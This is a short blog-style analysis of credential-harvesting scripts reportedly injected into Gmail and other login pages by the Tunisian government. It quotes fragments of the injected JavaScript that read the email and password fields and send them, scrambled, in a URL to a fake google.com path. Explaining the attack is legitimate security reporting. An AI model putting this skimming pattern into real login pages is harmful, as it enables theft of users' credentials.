It’s only January and we’ve just witnessed a first: cyber insecurity bringing down a government. The government of Tunisia, a Wikileak’s target, has been under severe scrutiny for corruption ever since Wikileaks exposed some dodgy practices.
The Tech Herald highlighted how the Tunisian government conducted a “cyber retaliation,” where usernames and passwords were harvested, presumably, by the government to monitor and/or manipulate citizen communications. Facebook, Gmail and Yahoo! were affected.
Imperva’s Application Defense Center (ADC) obtained the pages allegedly injected by Tunisian government:
Sorry, but this entry is about to get quite geeky. But for those of you who enjoy the anatomy of a hack, this is quite interesting. If you’re not a geek, basically these are pictures of a hacker’s hand in the cookie jar.
Compare the original Gmail form submission:
- The username is stored in the us3r (= user) variable. var us3r = frm.Email.value;
- The password is stored in the pa55 (= pass) variable. var pa55 = frm.Passwd.value;
The attack script then sends the credentials (after being scrambled with h6h function) to the nonexistent URL " http://www.google.com/wo0dh3ad" (= woodhead) as parameters:
var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);
Since the Tunisian government controls all internet transactions they could log all transactions to this link, it can easily obtain the credentials.